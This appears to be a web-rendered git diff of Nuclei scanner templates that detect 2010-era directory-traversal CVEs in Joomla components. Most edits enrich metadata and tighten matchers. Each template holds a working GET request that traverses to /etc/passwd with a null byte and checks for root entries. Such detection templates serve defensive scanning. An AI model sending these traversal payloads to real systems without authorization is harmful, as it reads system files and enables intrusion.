||||
- http://secunia.com/advisories/39524
|
||||
classification:
|
||||
cve-id: CVE-2010-1723
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/01
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component SMEStorage - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11853
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1858
|
||||
- http://web.archive.org/web/20210121194940/https://www.securityfocus.com/bid/38911/
|
||||
- http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1858
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/15
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Property - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11851
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1875
|
||||
- http://secunia.com/advisories/39074
|
||||
- http://web.archive.org/web/20210121194939/https://www.securityfocus.com/bid/38912/
|
||||
classification:
|
||||
cve-id: CVE-2010-1875
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/16
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12317
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1878
|
||||
- http://web.archive.org/web/20210121195712/https://www.securityfocus.com/bid/39606/
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt
|
||||
classification:
|
||||
cve-id: CVE-2010-1878
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/17
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component BeeHeard 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12239
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1952
|
||||
- http://secunia.com/advisories/39475
|
||||
- http://www.exploit-db.com/exploits/12239
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1952
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/15
|
||||
|
|
|
|||
|
|
@ -4,24 +4,28 @@ info:
|
|||
name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12288
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1953
|
||||
- http://www.vupen.com/english/advisories/2010/0927
|
||||
- http://www.exploit-db.com/exploits/12288
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1953
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/15
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12287
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1954
|
||||
- http://web.archive.org/web/20210121195625/https://www.securityfocus.com/bid/39552/
|
||||
- http://www.exploit-db.com/exploits/12287
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1954
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/15
|
||||
|
|
|
|||
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12238
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1955
|
||||
- http://web.archive.org/web/20210121195552/https://www.securityfocus.com/bid/39508/
|
||||
- http://secunia.com/advisories/39473
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1955
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/15
|
||||
|
|
|
|||
|
|
@ -4,24 +4,26 @@ info:
|
|||
name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12285
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1956
|
||||
- http://secunia.com/advisories/39522
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1956
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/15
|
||||
|
|
|
|||
|
|
@ -4,10 +4,14 @@ info:
|
|||
name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12235
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1957
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1957
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,8 +24,10 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/16
|
||||
|
|
|
|||
|
|
@ -4,10 +4,15 @@ info:
|
|||
name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12083
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1977
|
||||
- http://web.archive.org/web/20210121195306/https://www.securityfocus.com/bid/39243/
|
||||
- http://secunia.com/advisories/39356
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1977
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,8 +25,10 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/16
|
||||
|
|
|
|||
|
|
@ -4,10 +4,14 @@ info:
|
|||
name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12088
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1979
|
||||
- http://secunia.com/advisories/39360
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1979
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,8 +24,10 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/17
|
||||
|
|
|
|||
|
|
@ -4,10 +4,15 @@ info:
|
|||
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12085
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1980
|
||||
- http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt
|
||||
- http://www.exploit-db.com/exploits/12085
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-1980
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
|
@ -20,8 +25,10 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/17
|
||||
|
|
|
|||
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue